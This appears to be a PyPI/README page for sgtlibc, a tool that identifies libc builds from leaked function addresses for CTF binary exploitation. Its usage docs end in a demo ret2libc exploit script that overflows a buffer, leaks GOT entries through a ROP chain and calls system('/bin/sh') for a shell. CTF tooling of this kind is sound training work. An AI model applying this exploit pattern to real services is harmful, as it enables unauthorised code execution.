sgtlibc


- Name: sgtlibc
- Version: 1.16.0
- Home page: https://github.com/serfend/sgtlibc
- Summary: a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`
- Upload time: 2023-08-10 15:46:05
- Docs URL: None
- Author: serfend
- Requires Python: >=3.7, <4
- License: MIT Licence
- Keywords: libcsearcher
- Requirements: No requirements were recorded.
- Travis-CI: No Travis.
- Coveralls test coverage: No coveralls.
            






![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)![Ubuntu](https://img.shields.io/badge/Ubuntu-E95420?style=for-the-badge&logo=ubuntu&logoColor=white)![Kali](https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white)![FreeBSD](https://img.shields.io/badge/-FreeBSD-%23870000?style=for-the-badge&logo=freebsd&logoColor=white)![Deepin](https://img.shields.io/badge/Deepin-007CFF?style=for-the-badge&logo=deepin&logoColor=white)![Debian](https://img.shields.io/badge/Debian-D70A53?style=for-the-badge&logo=debian&logoColor=white)![Cent OS](https://img.shields.io/badge/cent%20os-002260?style=for-the-badge&logo=centos&logoColor=F0F0F0)

# What?

[sgtlibc](https://github.com/serfend/sgtlibc) is an offline Python library for searching libc functions and identifying the libc version.



## Install

```shell
pip install sgtlibc
```



## Usage

```shell
usage: sgtlibc [-h] [-d [DUMP ...]] [-i [INDEX]] [-s [SYMBOLS]] [-u [UPDATE]] [-v [VERSION]] [funcs_with_addresses]

a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s =
sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`

positional arguments:
  funcs_with_addresses  specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-puts address = 0xaa0;func-read address = 0x140 (default: None).

options:
  -h, --help            show this help message and exit
  -d [DUMP ...], --dump [DUMP ...]
                        select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).
  -i [INDEX], --index [INDEX]
                        db index on multi-database found occation (default: 0).
  -s [SYMBOLS], --symbols [SYMBOLS]
                        convert libc-elf file to symbols-file,use `libc_path [alias]` to convert.
  -u [UPDATE], --update [UPDATE]
                        update current libc database from internet , need non-microsoft-windows environment (default: False).
  -v [VERSION], --version [VERSION]
                        show version
```





## Quick Start

- in `cmd.exe` or `/bin/sh`

```shell
sgtlibc puts:aa0
sgtlibc puts:aa0+read:140
sgtlibc puts:aa0+read:140 --dump system binsh
```

- in `python3`

```python
import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)
s.add_condition('read',0x140)
print(s.dump())
print(s.dump(['system','str_bin_sh']))
```



## Example

- The main argument specifies each `func-name` and `func address`, which **SHOULD be split by `|`**

  eg: `puts:aa0+read:140` which means:

  - func-`puts` address = `0xaa0`
  - func-`read` address = `0x140`

- `--update` updates the libc database from the internet, based on `libc-database`; it **requires a non-Microsoft-Windows** system
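How a `name:address` condition narrows down a libc build, shown as an added example (not sgtlibc's own code). It assumes the usual libc-database approach of comparing only the low 12 bits of each address, which ASLR leaves unchanged because libraries are mapped page-aligned; the database entries, build names and the helper names `parse_conditions`, `search` and `resolve` are constructed for illustration.

```python
PAGE_MASK = 0xFFF  # mappings are page-aligned, so ASLR never changes the low 12 bits

# Constructed symbol tables: offsets are made up, not taken from real libc builds.
SAMPLE_DB = {
    "libc-sample-A": {"puts": 0x6FAA0, "read": 0xF7140,
                      "system": 0x45390, "str_bin_sh": 0x18CD57},
    "libc-sample-B": {"puts": 0x80AA0, "read": 0x110020,
                      "system": 0x4F550, "str_bin_sh": 0x1B3E1A},
    "libc-sample-C": {"puts": 0x5F140, "read": 0xD4350,
                      "system": 0x3A940, "str_bin_sh": 0x15902B},
}


def parse_conditions(spec):
    """Parse 'puts:aa0+read:140' into {'puts': 0xaa0, 'read': 0x140}."""
    conditions = {}
    for item in spec.split("+"):
        name, sep, addr = item.partition(":")
        if not sep or not name or not addr:
            raise ValueError(f"expected name:hexaddr, got {item!r}")
        conditions[name] = int(addr, 16)
    return conditions


def search(conditions, db=SAMPLE_DB):
    """Return the builds whose symbol offsets agree with every condition
    in the low 12 bits. Full leaked addresses work as well as 'aa0'."""
    matches = []
    for build, symbols in db.items():
        if all(name in symbols and (symbols[name] ^ addr) & PAGE_MASK == 0
               for name, addr in conditions.items()):
            matches.append(build)
    return matches


def resolve(build, leaked_name, leaked_addr, wanted, db=SAMPLE_DB):
    """Derive the load base from one full leaked address, then rebase
    the wanted symbols. A base that is not page-aligned means the
    chosen build does not match the leak."""
    symbols = db[build]
    base = leaked_addr - symbols[leaked_name]
    if base & PAGE_MASK:
        raise ValueError("base is not page-aligned: wrong build or bad leak")
    return {name: base + symbols[name] for name in wanted}


if __name__ == "__main__":
    print(search(parse_conditions("puts:aa0")))           # two candidates
    print(search(parse_conditions("puts:aa0+read:140")))  # narrowed to one
    addrs = resolve("libc-sample-A", "puts", 0x7F123456FAA0,
                    ["system", "str_bin_sh"])
    print({k: hex(v) for k, v in addrs.items()})
```

One condition often leaves several candidate builds, which is why a second function is added and why the tool exposes an index for choosing among multiple results.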

### python run

- run the [python code above](/#/Quick Start) and you'll get output like the following:

![image-20220605212842313](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605212842313.png)

### command run

- run the command in a terminal and you'll get output like the following:

  ![image-20220605213023151](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220605213023151.png)

### pwntools run

- use in `pwntools`

```python
from pwn import *  # requires: pip install pwntools
import sgtlibc
s = sgtlibc.Searcher()
puts_addr = 0xf71234567aa0  # from leak data
s.add_condition('puts', puts_addr)
s.dump(db_index=0)  # search libc; if multiple results are returned, index 0 is used by default
# p64 is the pwntools packer; p00 from sgtlibc.gamebox has the same effect
system_addr = p64(s.get_address(sgtlibc.s_system))
binsh_addr = p64(s.get_address(sgtlibc.s_binsh))
```



### use user-libc database

> search libc from user-directory

```python
import sgtlibc
from sgtlibc.utils import configuration as config

def test_use_user_libc():
    lib_path = './libs'  # put your libc directory here
    # point the searcher at the user-supplied database directory
    config.set(config.extension_database_path, lib_path)
    s = sgtlibc.LibcSearcher('puts', 0xf7007)
    s.decided()
```



### add user-libc database

> add a libc.so file to database

```bash
sgtlibc -s ./libc.from_user.so:alias_input_here
```

or

```python
from sgtlibc.main import do_symbols
do_symbols(f'./libc.from_user.so:alias_input_here')
```

## CTF Problem Solve DEMO

[view all sample files](https://github.com/serfend/sgtlibc/tree/main/samples/libc-leak/x64-babyrop)

- use exploit code

```python
import sgtlibc
from sgtlibc.gamebox import *
set_config(GameBoxConfig(
    is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
    auto_load=True,
    auto_show_rop=True,
    auto_show_summary=True,
    auto_start_game=True,
    auto_load_shell_str=True,
    auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf
def exp():
    payload_exp = [b'a' * (28 + 4),fakeebp()] # overflow position
    return payload_exp
def leak(func: str):
    payload = exp()
    # here will auto-pack to p64, you can use p64 or p00 as same effect.
    payload += [elf.rop['rdi'],elf.got[func],elf.plt['printf'],elf.symbols['main']]
    sl(payload)
    rl()
    data = rc(6).ljust(8, b'\0')
    data = uc(data)
    s.add_condition(func, data)
    return data
leak('printf')
leak('read')
data = s.dump(db_index=2)  # choose your system index
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = exp() 
payload += [elf.rop['rdi'],binsh_addr,system_addr, fakeebp()]
    
sl(payload)
interactive()
```

- result

![image-20220609134743902](https://raw.githubusercontent.com/serfend/res.image.reference/main/image-20220609134743902.png)





## Notice

> The default libc database was last updated on `2022-06-01`, which is a long time ago; we strongly recommend updating it by running `sgtlibc --update`




            
